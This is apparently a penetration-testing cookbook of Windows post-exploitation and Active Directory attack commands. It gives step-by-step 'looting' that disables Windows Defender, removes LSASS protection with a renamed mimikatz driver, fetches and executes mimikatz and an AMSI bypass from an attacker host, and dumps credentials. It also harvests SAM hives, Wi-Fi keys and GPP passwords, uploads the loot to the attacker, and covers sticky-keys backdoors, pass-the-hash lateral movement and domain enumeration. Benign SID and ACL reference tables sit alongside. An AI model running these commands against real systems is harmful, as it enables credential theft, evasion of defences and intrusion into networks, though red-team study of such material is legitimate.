        ~> reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fAllowToGetHelp" /t REG_DWORD /d 1 /f
        ~> reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "UserAuthentication" /t REG_DWORD /d 0 /f

        `` Enable restricted admin mode

            ~> reg.exe add "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa" /v "DisableRestrictedAdmin" /t REG_DWORD /d 0 /f

    `` Enabling scripts in Outlook client

        `` Outlook 2016

            ~> reg.exe add "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security" /v "EnableUnsafeClientMailRules" /t REG_DWORD /d 1 /f

        `` Outlook 2013

            ~> reg.exe add "HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Security" /v "EnableUnsafeClientMailRules" /t REG_DWORD /d 1 /f

        `` Outlook 2010

            ~> reg.exe add "HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Outlook\Security" /v "EnableUnsafeClientMailRules" /t REG_DWORD /d 1 /f

    `` Physical access

        `` Replace with cmd.exe (Sticky Keys)

            -- SHIFT 5 times
            C:\Windows\System32\sethc.exe

            -- WINDOWS+U
            C:\Windows\System32\Utilman.exe

            -- WINDOWS+U, on-screen keyboard
            C:\Windows\System32\osk.exe

            -- WINDOWS+P
            C:\Windows\System32\DisplaySwitch.exe

        `` Attach debugger, for example:

            ~> reg.exe add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe /k" /f

        `` Windows 10 (virtual keyboard)

            ~> reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe" /v "Debugger" /t REG_SZ /d "cmd.exe" /f

    `` Runas

        @ snippets/windows/utils/runas*

`` Looting

    `` Standard looting procedure after getting local admin

        -- Start HTTP receiver
        ~$ ~/lib/pentesting-cookbook/bin/httpd.py -p 8008

        -- Is Tamper Protection enabled?
        ~PS> (Get-MpComputerStatus).IsTamperProtected 
 
        -- If not, disable Windows Defender, sample submission and cloud analytics
        -- Otherwise disable Tamper Protection using GUI first
        ~> powershell.exe -c "Set-MpPreference -DisableRealtimeMonitoring 1 -SubmitSamplesConsent NeverSend -MAPSReporting Disabled"

        -- Download tools
        ~> mkdir c:\Windows\Tasks\tmp\
        ~> curl.exe "http://VAR_ATTACKER_HOST/mimidrv.sys" -o C:\Windows\system32\IntelAudioRTX.sys
        ~> curl.exe "http://VAR_ATTACKER_HOST/minidump.exe" -o C:\Windows\Tasks\tmp\minidump.exe
        ~> curl.exe "http://VAR_ATTACKER_HOST/mimikatz.exe" -o C:\Windows\Tasks\tmp\mimikatz.exe

        -- Disable LSASS process protection
        ~> sc.exe create IntelAudioRTX binPath= C:\Windows\system32\IntelAudioRTX.sys type= kernel start= demand
        ~> sc.exe start IntelAudioRTX
        ~> powershell
        ~PS> (New-Object System.Net.WebClient).DownloadString('http://VAR_ATTACKER_HOST/amsi.txt') | IEX
        ~PS> (New-Object System.Net.WebClient).DownloadString('http://VAR_ATTACKER_HOST/mimikatz.txt') | IEX
        ~PS> Invoke-Mimikatz -Command "`"!processprotect /process:lsass.exe /remove`""
        ~PS> exit

        -- Dump LSASS process memory
        ~> mkdir C:\Windows\Tasks\tmp\loot
        ~> C:\Windows\Tasks\tmp\minidump.exe
        ~> move C:\Windows\Tasks\lsass.dmp C:\Windows\Tasks\tmp\loot\

        -- Grab the most important things related to Kerberos and locally stored credentials
        ~> powershell
        ~PS> cd C:\Windows\Tasks\tmp\loot
        ~PS> C:\Windows\Tasks\tmp\mimikatz.exe "privilege::debug" "sekurlsa::minidump C:\Windows\Tasks\tmp\loot\lsass.dmp" "sekurlsa::logonpasswords" "sekurlsa::tickets /export" "sekurlsa::ekeys" exit > C:\Windows\Tasks\tmp\loot\mimikatz.log

        -- Compress and send home (using ~/lib/pentesting-cookbook/bin/httpd.py on the other end)
        ~> tar.exe -a -c -f C:\Windows\Tasks\tmp.zip C:\Windows\Tasks\tmp\loot
        -- Configure the client in case there's a web proxy
        ~PS> [System.Net.WebRequest]::DefaultWebProxy = [System.Net.WebRequest]::GetSystemWebProxy()
        ~PS> [System.Net.WebRequest]::DefaultWebProxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials
        -- And now send home (using ~/lib/pentesting-cookbook/bin/httpd.py on the other end)
        ~PS> (New-Object System.Net.WebClient).UploadFile('http://VAR_ATTACKER_HOST:8008/dc.example.com.zip', 'C:\Windows\Tasks\tmp.zip')

    `` Passwords

        `` Registry

            - HKCU\Software\ORL\WinVNC3\Password
            - HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon (autologon credentials)
            - HKLM\SYSTEM\CurrentControlSet\Services\SNMP
            - HKCU\Software\TightVNC\Server
            - HKCU\Software\SimonTatham\PuTTY\Sessions
            - HKCU\Software\OpenSSH\Agent\Key

            ~> reg.exe save "HKLM\SYSTEM" %TEMP%\SYSTEM.bak
            ~> reg.exe save "HKLM\SAM" %TEMP%\SAM.bak
            ~> reg.exe save "HKLM\SECURITY" %TEMP%\SECURITY.bak

            ~> reg.exe query HKLM /f password /t REG_SZ /s
            ~> reg.exe query HKCU /f password /t REG_SZ /s

        `` Windows Server 2007

            C:\Windows\System32\config\SAM
            C:\Windows\System32\config\SYSTEM
            C:\Windows\System32\config\RegBack\SAM
            C:\Windows\System32\config\RegBack\SAM.OLD
            C:\Windows\System32\config\RegBack\SYSTEM
            C:\Windows\System32\config\RegBack\SYSTEM.OLD

        `` Windows XP

            C:\Windows\repair\SAM
            C:\Windows\repair\SECURITY
            C:\Windows\repair\system

        `` Other locations

            ~> dir %SYSTEMROOT%\repair\SAM 2>nul
            ~> dir %SYSTEMROOT%\System32\config\RegBack\SAM 2>nul
            ~> dir %SYSTEMROOT%\System32\config\SAM 2>nul
            ~> dir %SYSTEMROOT%\repair\system 2>nul
            ~> dir %SYSTEMROOT%\System32\config\SYSTEM 2>nul
            ~> dir %SYSTEMROOT%\System32\config\RegBack\system 2>nul
            ~> dir /a /b /s SAM.b*

        `` Windows Autologin

            ~> reg.exe query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"

        `` Putty

            ~> reg.exe query "HKCU\Software\SimonTatham\PuTTY\Sessions"

        `` Stored credentials (DPAPI)

            `` Windows Vista and later

                - C:\Users\VAR_USERNAME\AppData\Roaming\Microsoft\Credentials
                - C:\Users\VAR_USERNAME\AppData\Local\Microsoft\Credentials

            `` Windows 8 and later
            
                - C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Credentials

            `` Windows XP
            
                - C:\Documents and Settings\VAR_USERNAME\Application Data\Microsoft\Credentials
                - C:\Documents and Settings\VAR_USERNAME\Local Settings\Application Data\Microsoft\Credentials

            `` Vault
            
                - C:\Users\VAR_USERNAME\AppData\Local\Microsoft\Vault
                - C:\ProgramData\Microsoft\Vault
                - C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Vault                

            ~$ python /opt/impacket/examples/dpapi.py credential -file credentials

        `` Force wdigest provider to keep passwords in memory (cleartext in LSASS), then wait for / trigger new logons:

            -- NOTE: needs local admin; only logons made AFTER the change are affected, and creating this value is a well-known detection (registry-set telemetry on ...\WDigest\UseLogonCredential). Remove it when the engagement ends.
            ~> reg.exe add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
            ~> reg.exe delete HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /f

    `` Wireless

            -- Grab all keys
            ~> netsh.exe wlan show profile name=* key=clear

            -- [Source: https://raw.githubusercontent.com/BankSecurity/Red_Team/master/Credential_Access/Wifi_Passwords.txt]

            ~> powershell.exe netsh.exe wlan show profiles|Select-String -Pattern " User Profile"|ForEach-Object{echo $_.Line.split(':')[1].trim()}|ForEach-Object{netsh.exe wlan show profiles name=$_ key=clear}|Select-String -Pattern "Key Content|SSID name"

            -- Windows 10
            ~> powershell.exe (netsh.exe wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh.exe wlan show profile name="$name" key=clear)}  | Select-String "Key Content\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ SID_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize

            -- Windows 7 or PS Version 2.0
            ~> (netsh.exe wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches | % {$_.Groups[1].Value.Trim()}; $_} |%{(netsh.exe wlan show profile name="$name" key=clear)} | Select-String "Key Content\W+\:(.+)$" | %{$pass=$_.Matches | % {$_.Groups[1].Value.Trim()}; $_} | %{[PSCustomObject]@{ SID_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize

    `` GPP

        -- Fixed by MS14-025 (new cpassword entries can no longer be created), but legacy XML files carrying the value often remain in SYSVOL; the AES key used to encrypt it is public
        ~> findstr.exe /S /I cpassword \\VAR_DOMAIN\sysvol\VAR_DOMAIN\*.xml

        ~> ruby gppdecrypt.rb encrypted_output
        ~PS> Get-GPPPassword

`` Lateral Movement

    `` Networking

        `` Opening ports

            -- Legacy
            ~> netsh.exe firewall add portopening tcp VAR_TARGET_PORT "VAR_STRING"

            -- Current
            ~> netsh.exe advfirewall firewall add rule name="VAR_STRING" dir=in action=allow protocol=TCP localport=VAR_TARGET_PORT
            ~> netsh.exe advfirewall firewall add rule name="VAR_STRING" dir=in action=allow program="C:\VAR_STRING.exe" enable=yes

            -- Cleanup: remove the rule once it is no longer needed
            ~> netsh.exe advfirewall firewall delete rule name="VAR_STRING"

    `` Enabling psexec

        -- Syntax is: net use \\host\share PASSWORD /user:[DOMAIN\]USERNAME
        ~> net.exe use \\VAR_TARGET_HOST\ipc$ VAR_PASSWORD /user:VAR_USERNAME
        ~> sc.exe \\VAR_TARGET_HOST config netdde start= auto
        ~> sc.exe \\VAR_TARGET_HOST config netddedsdm start= auto
        ~> sc.exe \\VAR_TARGET_HOST config clipsrv start= auto
        ~> sc.exe \\VAR_TARGET_HOST start netdde
        ~> sc.exe \\VAR_TARGET_HOST start netddedsdm
        ~> sc.exe \\VAR_TARGET_HOST start clipsrv

    `` PsExec

        ~> PsExec.exe -accepteula \\VAR_TARGET_HOST -u VAR_DOMAIN\VAR_USERNAME cmd.exe
        ~$ impacket-psexec.py VAR_DOMAIN/VAR_USERNAME@VAR_TARGET_HOST cmd -path c:\\windows\\system32

    `` WMI

        `` Windows

            -- wmic.exe is deprecated and may be absent on current Windows 11 / Server builds; fall back to Invoke-CimMethod (Win32_Process Create) or impacket-wmiexec when it is missing
            ~> wmic.exe /node:VAR_TARGET_HOST /user:VAR_DOMAIN\VAR_USERNAME path win32_process call create "VAR_STRING"
            ~> wmic.exe /node:@textfile /user:VAR_DOMAIN\VAR_USERNAME path win32_process call create "VAR_STRING"

        `` Linux

            ~$ pth-winexe -U VAR_DOMAIN/VAR_USERNAME%VAR_LM_HASH:VAR_NT_HASH //VAR_TARGET_HOST cmd.exe
            ~$ wmiexec.py -hashes VAR_LM_HASH:VAR_NT_HASH VAR_USERNAME@VAR_TARGET_HOST
            ~$ wmiexec.py -hashes VAR_LM_HASH:VAR_NT_HASH VAR_DOMAIN/Administrator@VAR_TARGET_HOST "taskkill /f /fi \"USERNAME eq Administrator\""

    `` RDP

        -- Pass-the-hash over RDP: only works when Restricted Admin mode is enabled on the target (HKLM\SYSTEM\CurrentControlSet\Control\Lsa\DisableRestrictedAdmin = 0)
        ~$ xfreerdp /u:VAR_USERNAME /d:VAR_DOMAIN /pth:VAR_NT_HASH /v:VAR_TARGET_HOST
        
        -- Low bandwidth
        ~$ xfreerdp -themes -wallpaper +compression +clipboard /bpp:16 /v:VAR_TARGET_HOST /u:VAR_USERNAME /rfx /rfx-mode:video /gfx +gfx-progressive +gfx-h264 /p:'VAR_PASSWORD'

    `` WinRM

        `` Configure the remote machine to work with WinRM

            ~PS> Enable-PSRemoting -Force

        `` Testing the WinRM Connection

            ~PS> Test-WSMan VAR_TARGET_HOST

        `` Adding Trusted Host in WinRM

            -- Run this on the machine you connect FROM: TrustedHosts lists the remote hosts that may be reached with non-Kerberos (NTLM / Basic) auth
            ~> winrm set winrm/config/client @{TrustedHosts="VAR_TARGET_HOST"}

        `` Execute commands using Powershell Invoke-Command on the target over WinRM

            ~PS> Invoke-Command -ComputerName VAR_TARGET_HOST -ScriptBlock {ipconfig.exe /all}

        `` Interactive session

            ~PS> Enter-PSSession -ComputerName VAR_TARGET_HOST
            ~PS> Enter-PSSession -ComputerName VAR_TARGET_HOST -Credential VAR_DOMAIN\VAR_USERNAME

        `` Disable Powershell Remoting

            -- NOTE: Disable-PSRemoting only removes the session configurations; the WinRM service and its firewall exception stay in place (Stop-Service WinRM / Set-Service WinRM -StartupType Disabled if cleanup requires it)
            ~PS> Disable-PSRemoting -Force

    `` DCOM

        `` DCOM applications via MMC Application Class (MMC20.Application)

            -- "IPAddress" below is the remote target (VAR_TARGET_HOST); this needs local admin there and DCOM reachable (TCP 135 plus the dynamic RPC port range)

            ~PS> $com = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","IPAddress"))
            ~PS> $com.Document.ActiveView.ExecuteShellCommand("C:\Windows\System32\calc.exe",$null,$null,7)

        `` DCOM via ShellExecute

            ~PS> $com = [Type]::GetTypeFromCLSID('9BA05972-F6A8-11CF-A442-00A0C90A8F39',"IPAddress")
            ~PS> $obj = [System.Activator]::CreateInstance($com)
            ~PS> $item = $obj.Item()
            ~PS> $item.Document.Application.ShellExecute("cmd.exe","/c calc.exe","C:\windows\system32",$null,0)

        `` DCOM via ShellBrowserWindow (Windows 10)

            ~PS> $com = [Type]::GetTypeFromCLSID('C08AFD90-F2A1-11D1-8455-00A0C91F3880',"IPAddress")
            ~PS> $obj = [System.Activator]::CreateInstance($com)
            ~PS> $obj.Application.ShellExecute("cmd.exe","/c calc.exe","C:\windows\system32",$null,0)

    `` Shutdown

        -- Samba's 'net' from the attacking box (this is not Windows net.exe syntax)
        ~$ net rpc shutdown -I VAR_TARGET_IP -U VAR_USERNAME%VAR_PASSWORD

`` Environment Variables

    - %ALLUSERSPROFILE%
    - %COMPUTERNAME%
    - %COMSPEC%
    - %DATE%
    - %HOMEDRIVE%
    - %HOMEPATH%
    - %HOMESHARE%
    - %LOGONSERVER%
    - %PATH%
    - %PATHEXT%
    - %RANDOM%
    - %SYSTEM32%
    - %SYSTEMDRIVE%
    - %SYSTEMROOT%
    - %TEMP%
    - %TIME%
    - %USERDOMAIN%
    - %USERNAME%
    - %USERPROFILE%
    - %USERSID%
    - %WINDIR%

`` Well-known SIDs (all versions of Windows):

    -- Source: https://support.microsoft.com/en-au/help/243330/well-known-security-identifiers-in-windows-operating-systems

    - S-1-0 - Null Authority - An identifier authority.
    - S-1-0-0 - Nobody - No security principal.
    - S-1-1 - World Authority - An identifier authority.
    - S-1-1-0 - Everyone - A group that includes all users, even anonymous users and guests. Membership is controlled by the operating system. Note: By default, the Everyone group no longer includes anonymous users on a computer that is running Windows XP Service Pack 2 (SP2).
    - S-1-2 - Local Authority - An identifier authority.
    - S-1-2-0 - Local - A group that includes all users who have logged on locally.
    - S-1-3 - Creator Authority - An identifier authority.
    - S-1-3-0 - Creator Owner - A placeholder in an inheritable access control entry (ACE). When the ACE is inherited, the system replaces this SID with the SID for the object's creator.
    - S-1-3-1 - Creator Group - A placeholder in an inheritable ACE. When the ACE is inherited, the system replaces this SID with the SID for the primary group of the object's creator. The primary group is used only by the POSIX subsystem.
    - S-1-3-4 - Owner Rights - A group that represents the current owner of the object. When an ACE that carries this SID is applied to an object, the system ignores the implicit READ_CONTROL and WRITE_DAC permissions for the object owner.
    - S-1-4 - Non-unique Authority - An identifier authority.
    - S-1-5 - NT Authority - An identifier authority.
    - S-1-5-1 - Dialup - A group that includes all users who have logged on through a dial-up connection. Membership is controlled by the operating system.
    - S-1-5-2 - Network - A group that includes all users that have logged on through a network connection. Membership is controlled by the operating system.
    - S-1-5-3 - Batch - A group that includes all users that have logged on through a batch queue facility. Membership is controlled by the operating system.
    - S-1-5-4 - Interactive - A group that includes all users that have logged on interactively. Membership is controlled by the operating system.
    - S-1-5-5-X-Y - Logon Session - A logon session. The X and Y values for these SIDs are different for each session.
    - S-1-5-6 - Service - A group that includes all security principals that have logged on as a service. Membership is controlled by the operating system.
    - S-1-5-7 - Anonymous - A group that includes all users that have logged on anonymously. Membership is controlled by the operating system.
    - S-1-5-9 - Enterprise Domain Controllers - A group that includes all domain controllers in a forest that uses an Active Directory directory service. Membership is controlled by the operating system.
    - S-1-5-10 - Principal Self - A placeholder in an inheritable ACE on an account object or group object in Active Directory. When the ACE is inherited, the system replaces this SID with the SID for the security principal who holds the account.
    - S-1-5-11 - Authenticated Users - A group that includes all users whose identities were authenticated when they logged on. Membership is controlled by the operating system.
    - S-1-5-12 - Restricted Code - This SID is reserved for future use.
    - S-1-5-13 - Terminal Server Users - A group that includes all users that have logged on to a Terminal Services server. Membership is controlled by the operating system.
    - S-1-5-14 - Remote Interactive Logon - A group that includes all users who have logged on through a terminal services logon.
    - S-1-5-17 - IUSR - An account that is used by the default Internet Information Services (IIS) user.
    - S-1-5-18 - Local System - A service account that is used by the operating system.
    - S-1-5-19 - NT Authority - Local Service
    - S-1-5-20 - NT Authority - Network Service
    - S-1-5-21-domain-500 - Administrator - A user account for the system administrator. By default, it is the only user account that is given full control over the system.
    - S-1-5-21-domain-501 - Guest - A user account for people who do not have individual accounts. This user account does not require a password. By default, the Guest account is disabled.
    - S-1-5-21-domain-502 - KRBTGT - A service account that is used by the Key Distribution Center (KDC) service.
    - S-1-5-21-domain-512 - Domain Admins - A global group whose members are authorized to administer the domain. By default, the Domain Admins group is a member of the Administrators group on all computers that have joined a domain, including the domain controllers. Domain Admins is the default owner of any object that is created by any member of the group.
    - S-1-5-21-domain-513 - Domain Users - A global group that, by default, includes all user accounts in a domain. When you create a user account in a domain, it is added to this group by default.
    - S-1-5-21-domain-514 - Domain Guests - A global group that, by default, has only one member, the domain's built-in Guest account.
    - S-1-5-21-domain-515 - Domain Computers - A global group that includes all clients and servers that have joined the domain.
    - S-1-5-21-domain-516 - Domain Controllers - A global group that includes all domain controllers in the domain. New domain controllers are added to this group by default.
    - S-1-5-21-domain-517 - Cert Publishers - A global group that includes all computers that are running an enterprise certification authority. Cert Publishers are authorized to publish certificates for User objects in Active Directory.
    - S-1-5-21-root domain-518 - Schema Admins - A universal group in a native-mode domain; a global group in a mixed-mode domain. The group is authorized to make schema changes in Active Directory. By default, the only member of the group is the Administrator account for the forest root domain.
    - S-1-5-21-root domain-519 - Enterprise Admins - A universal group in a native-mode domain; a global group in a mixed-mode domain. The group is authorized to make forest-wide changes in Active Directory, such as adding child domains. By default, the only member of the group is the Administrator account for the forest root domain.
    - S-1-5-21-domain-520 - Group Policy Creator Owners - A global group that is authorized to create new Group Policy objects in Active Directory. By default, the only member of the group is Administrator.
    - S-1-5-21-domain-526 - Key Admins - A security group. The intention for this group is to have delegated write access on the msdsKeyCredentialLink attribute only. The group is intended for use in scenarios where trusted external authorities (for example, Active Directory Federated Services) are responsible for modifying this attribute. Only trusted administrators should be made a member of this group.
    - S-1-5-21-domain-527 - Enterprise Key Admins - A security group. The intention for this group is to have delegated write access on the msdsKeyCredentialLink attribute only. The group is intended for use in scenarios where trusted external authorities (for example, Active Directory Federated Services) are responsible for modifying this attribute. Only trusted administrators should be made a member of this group.
    - S-1-5-21-domain-553 - RAS and IAS Servers - A domain local group. By default, this group has no members. Servers in this group have Read Account Restrictions and Read Logon Information access to User objects in the Active Directory domain local group.
    - S-1-5-32-544 - Administrators - A built-in group. After the initial installation of the operating system, the only member of the group is the Administrator account. When a computer joins a domain, the Domain Admins group is added to the Administrators group. When a server becomes a domain controller, the Enterprise Admins group also is added to the Administrators group.
    - S-1-5-32-545 - Users - A built-in group. After the initial installation of the operating system, the only member is the Authenticated Users group. When a computer joins a domain, the Domain Users group is added to the Users group on the computer.
    - S-1-5-32-546 - Guests - A built-in group. By default, the only member is the Guest account. The Guests group allows occasional or one-time users to log on with limited privileges to a computer's built-in Guest account.
    - S-1-5-32-547 - Power Users - A built-in group. By default, the group has no members. Power users can create local users and groups; modify and delete accounts that they have created; and remove users from the Power Users, Users, and Guests groups. Power users also can install programs; create, manage, and delete local printers; and create and delete file shares.
    - S-1-5-32-548 - Account Operators - A built-in group that exists only on domain controllers. By default, the group has no members. By default, Account Operators have permission to create, modify, and delete accounts for users, groups, and computers in all containers and organizational units of Active Directory except the Builtin container and the Domain Controllers OU. Account Operators do not have permission to modify the Administrators and Domain Admins groups, nor do they have permission to modify the accounts for members of those groups.
    - S-1-5-32-549 - Server Operators - A built-in group that exists only on domain controllers. By default, the group has no members. Server Operators can log on to a server interactively; create and delete network shares; start and stop services; back up and restore files; format the hard disk of the computer; and shut down the computer.
    - S-1-5-32-550 - Print Operators - A built-in group that exists only on domain controllers. By default, the only member is the Domain Users group. Print Operators can manage printers and document queues.
    - S-1-5-32-551 - Backup Operators - A built-in group. By default, the group has no members. Backup Operators can back up and restore all files on a computer, regardless of the permissions that protect those files. Backup Operators also can log on to the computer and shut it down.
    - S-1-5-32-552 - Replicators - A built-in group that is used by the File Replication service on domain controllers. By default, the group has no members. Do not add users to this group.
    - S-1-5-32-582 - Storage Replica Administrators - A built-in group that grants complete and unrestricted access to all features of Storage Replica.
    - S-1-5-64-10 - NTLM Authentication - An SID that is used when the NTLM authentication package authenticated the client.
    - S-1-5-64-14 - SChannel Authentication - An SID that is used when the SChannel authentication package authenticated the client.
    - S-1-5-64-21 - Digest Authentication - An SID that is used when the Digest authentication package authenticated the client.
    - S-1-5-80 - NT Service - An NT Service account prefix.

`` Windows Service ACLs

    ~> sc.exe sdshow VAR_STRING

    - Each (...) is one ACE: the first field is the type, allow (A) or deny (D); then the rights; the last field is the trustee (a SID or one of the aliases below).

    - S: — System Access Control List (SACL)
    - D: — Discretionary ACL (DACL)

    - CC — SERVICE_QUERY_CONFIG (request service settings)
    - LC — SERVICE_QUERY_STATUS (service status polling)
    - SW — SERVICE_ENUMERATE_DEPENDENTS
    - LO — SERVICE_INTERROGATE
    - CR — SERVICE_USER_DEFINED_CONTROL
    - RC — READ_CONTROL
    - RP — SERVICE_START
    - WP — SERVICE_STOP
    - DT — SERVICE_PAUSE_CONTINUE
    - DC — SERVICE_CHANGE_CONFIG (rewrite binPath / service account — the classic privesc when granted to a low-privileged principal)
    - SD — DELETE
    - WD — WRITE_DAC
    - WO — WRITE_OWNER

    - AU Authenticated Users
    - AO Account operators
    - RU Pre-Windows 2000 Compatible Access (alias)
    - AN Anonymous logon
    - AU Authenticated users
    - BA Built-in administrators
    - BG Built-in guests
    - BO Backup operators
    - BU Built-in users
    - CA Certificate server administrators
    - CG Creator group
    - CO Creator owner
    - DA Domain administrators
    - DC Domain computers
    - DD Domain controllers
    - DG Domain guests
    - DU Domain users
    - EA Enterprise administrators
    - ED Enterprise domain controllers
    - WD Everyone
    - PA Group Policy administrators
    - IU Interactively logged-on user
    - LA Local administrator
    - LG Local guest
    - LS Local service account
    - SY Local system
    - NU Network logon user
    - NO Network configuration operators
    - NS Network service account
    - PO Printer operators
    - PS Personal self
    - PU Power users
    - RS RAS servers group
    - RD Terminal server users
    - RE Replicator
    - RC Restricted code
    - SA Schema administrators
    - SO Server operators
    - SU Service logon user

`` Research

    `` System-wide proxy

        `` Enable

            ~> reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyServer /t REG_SZ /d 127.0.0.1:8080 /f
            ~> reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyEnable /t REG_DWORD /d 1 /f

        `` Disable

            ~> reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyEnable /t REG_DWORD /d 0 /f


================================================
FILE: Target.Host.Service.AD.txt
================================================
`` Helpers

    `` Powerview

        ~PS> IEX(New-Object System.Net.WebClient).DownloadString('http://VAR_ATTACKER_HOST:8001/amsi-bypass.ps1')
        ~PS> IEX(New-Object System.Net.WebClient).DownloadString('http://VAR_ATTACKER_HOST:8001/powerview.ps1')

    `` Toolkit

        ~PS> IEX(New-Object System.Net.WebClient).DownloadString('http://VAR_ATTACKER_HOST:8001/mimikatz.ps1')
        
        ~> mkdir C:\tools & cd C:\tools
        ~> curl.exe -O http://VAR_ATTACKER_HOST:8001/Grouper2.exe
        ~> curl.exe -O http://VAR_ATTACKER_HOST:8001/Incognito.exe
        ~> curl.exe -O http://VAR_ATTACKER_HOST:8001/minidump.exe
        ~> curl.exe -O http://VAR_ATTACKER_HOST:8001/Rubeus.exe
        ~> curl.exe -O http://VAR_ATTACKER_HOST:8001/Sysinternals/strings.exe
        ~> curl.exe -O http://VAR_ATTACKER_HOST:8001/Sysinternals/PsExec64.exe
        ~> curl.exe -O http://VAR_ATTACKER_HOST:8001/Sysinternals/accesschk64.exe
        ~> curl.exe -O http://VAR_ATTACKER_HOST:8001/Sysinternals/sdelete64.exe

    `` RAST

        ~PS> curl.exe -O "http://VAR_ATTACKER_HOST:8001/Microsoft.ActiveDirectory.Management.dll"
        ~PS> $Env:ADPS_LoadDefaultDrive = 0
        ~PS> Import-Module .\Microsoft.ActiveDirectory.Management.dll

    `` Powershell LDAP

        -- Initializing LDAP connection with domain connected machine
        ~PS> $ds = [adsisearcher]""

        -- Otherwise
        ~PS> $dn = New-Object System.DirectoryServices.DirectoryEntry("LDAP://VAR_DOMAIN_HOST:389", "VAR_USERNAME", "VAR_PASSWORD")
        ~PS> $ds = New-Object System.DirectoryServices.DirectorySearcher($dn)

`` Information Gathering

    `` Objects

        `` Computers

            ~> net.exe view /domain

            ~PS> $ds.Filter = "((objectCategory=computer))"
            ~PS> $computers = $ds.FindAll()
            ~PS> foreach ($comp in $computers) {
            ~PS>     $compHostname = $comp.properties.dnshostname
            ~PS>     if ($compHostname) {
            ~PS>         $compHostname | Out-File -Append hosts.txt
            ~PS>     }
            ~PS> }

            -- Powerview
            ~PS> Get-DomainComputer
        
            -- Powerview: all hosts with DNS resolution
            ~PS> Get-ForestGlobalCatalog | %{ Get-DomainComputer -Properties dnshostname -Domain $_.Domain | %{ if ($_.dnshostname) { Get-IPAddress $_.dnshostname } } }

        `` Printers

            ~PS> $ds.Filter = "((objectCategory=printqueue))"
            ~PS> $printers = $ds.FindAll()

            -- A simple output for targeting domain attached printers
            ~PS> foreach ($pri in $printers) { $pri.properties.printername + $pri.properties.servername + $pri.properties.printlanguage + ' '}

        `` Users

            ~> net.exe user /domain

            ~PS> $ds.Filter = "((objectCategory=user))"
            ~PS> $users = $ds.FindAll()

            -- Slow but detailed and very likely to be noisy
            ~> wmic.exe useraccount list /format:list

            -- Powerview
            ~PS> Get-DomainUser
            ~PS> Invoke-UserHunter -Stealth -GroupName "Remote Desktop Users"

            -- Impacket
            ~$ proxychains impacket-GetADUsers.py -k -no-pass -dc-ip VAR_TARGET_HOST VAR_TARGET_DOMAIN/VAR_USERNAME

        `` Users that have the property 'Do not require Kerberos preauthentication' set (UF_DONT_REQUIRE_PREAUTH)

            ~$ impacket-GetNPUsers -dc-ip VAR_TARGET_HOST VAR_TARGET_DOMAIN/VAR_USERNAME:VAR_PASSWORD

        `` By object name

            ~PS> $ds.Filter = "((name=*admin*))"
            ~PS> $ds.Findall()

        `` Groups

            ~> net.exe group /domain

            ~PS> $ds.Filter = "((objectCategory=group))"
            ~PS> $groups = $ds.FindAll()

            -- Members of a specific group (direct members only)
            ~PS> $ds.Filter = "(&(objectCategory=user)(memberOf=CN=Domain Admins,CN=Users,DC=VAR_DOMAIN,DC=VAR_DOMAIN))"
            -- Including nested membership (LDAP_MATCHING_RULE_IN_CHAIN)
            ~PS> $ds.Filter = "(&(objectCategory=user)(memberOf:1.2.840.113556.1.4.1941:=CN=Domain Admins,CN=Users,DC=VAR_DOMAIN,DC=VAR_DOMAIN))"
            ~PS> $ds.Findall()

            -- Powerview
            ~PS> Get-DomainGroup
            ~PS> Get-DomainGroup -MemberIdentity VAR_USERNAME

        `` Permissions

            ~PS> Get-NetGPO | Get-ObjectAcl -ResolveGUIDs | Where-Object {($_.ObjectType -eq 'All') -and ($_.ActiveDirectoryRights -match "GenericAll|GenericWrite|WriteProperty|CreateChild" )}
            ~PS> Get-NetGPO -Identity VAR_USERNAME -Domain VAR_DOMAIN -DomainController VAR_DOMAIN_HOST | Get-ObjectAcl -ResolveGUIDs | Where-Object {($_.ObjectType -eq 'All') -and ($_.ActiveDirectoryRights -match "GenericAll|GenericWrite|WriteProperty|CreateChild" )}

    `` Services

        `` SPNs

            ~> setspn.exe -T * -Q */*

            -- Using Impacket
            ~$ proxychains impacket-GetUserSPNs.py -k -no-pass -dc-ip VAR_TARGET_HOST VAR_TARGET_DOMAIN/VAR_USERNAME

        `` RDP

            -- Powerview
            ~PS> Get-DomainGPOUserLocalGroupMapping -Identity VAR_USERNAME -Domain VAR_TARGET_DOMAIN -LocalGroup RDP

    `` Policies

        `` Powerview

            -- Find GPO location
            ~PS> Find-GPOLocation -Domain VAR_TARGET_DOMAIN

            -- List ACLs for GPO
            ~PS> Get-NetGPO | %{Get-ObjectAcl -ResolveGUIDs -Name $_.Name}

        `` Grouper2

            ~> C:\tools\Grouper2.exe -i 10 -g

    `` Domains

        `` Enumeration

            ~PS> [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
